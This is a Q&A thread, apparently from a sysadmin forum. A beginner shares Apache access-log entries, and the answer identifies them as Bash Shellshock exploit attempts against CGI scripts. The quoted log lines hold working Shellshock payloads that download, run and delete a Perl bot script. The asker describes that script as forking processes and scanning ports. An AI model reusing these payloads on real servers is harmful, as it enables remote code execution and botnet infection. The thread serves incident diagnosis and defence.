Hacking to the apache using cgi script


I newbie to web programming, so I setup an apache2 sever for my practice.

It seems that someone succeeded to hack my apache server.
I have notice in my access.log the following line: - - [22/Jan/2015:17:24:39 +0200] "GET /cgi-bin/contact.cgi HTTP/1.1" 200 1531 "-" "() { :;};/usr/     bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget      -O /tmp/b.pl;curl -O /tmp/b.pl;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'"

and also this one: - - [22/Jan/2015:18:21:08 +0200] "GET /phppath/cgi_wrapper HTTP/1.0" 200 3360 "-" "() { :;};/usr/bin/perl -e 'print      \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESSX\";system(\"wget -O /tmp/bot.pl;perl /tmp/bot.pl;rm -     rf /tmp/bot.pl\");'"

It seems that they already succeeded to hack, according to HTTP-200, means the request granted.

When i try to 'track' the command in the request(by executing each command manually):

system(\"wget -O /tmp/bot.pl;perl /tmp/bot.pl;rm - rf /tmp/bot.pl\");'"

I can see that i succeed to download the file 'bot.txt'.
when i open the 'bot.txt' file and saw its a perl script.
I am not a perl monk but I can see that its 'forking' other process which each try to open ports to other servers. also saw a function inside the code which try to search for open ports in my station.

My questions:

  • someone know this issue ?
  • how can I configure my apache2.conf to prevent such hacking ?


Best Answer

The attacker is attempting to exploit the Bash Shellshock vulnerability. You can verify whether or not you're vulnerable with a couple simple command-line tests (which by themselves are not harmful), already covered in another SF post:

Your logs show that they returned 200 HTTP status codes, indicating that Apache serviced both requests without error. Had either contact.cgi or cgi_wrapper failed, I would have expected Apache to return a 500 (internal server error) status code instead. This suggests that both scripts at least attempted the Shellshock exploit.

If you are able to determine that you have a vulnerable version of Bash on your system, then I think it's likely that the ou.pl and bot.pl scripts were indeed downloaded and executed on your system. Given that, you should not make any assumptions about the system's integrity, because there's really no way to know what may have been done after the initial break-in. How you handle this is something you will have to determine on your own, but there are some good suggestions in this SF question: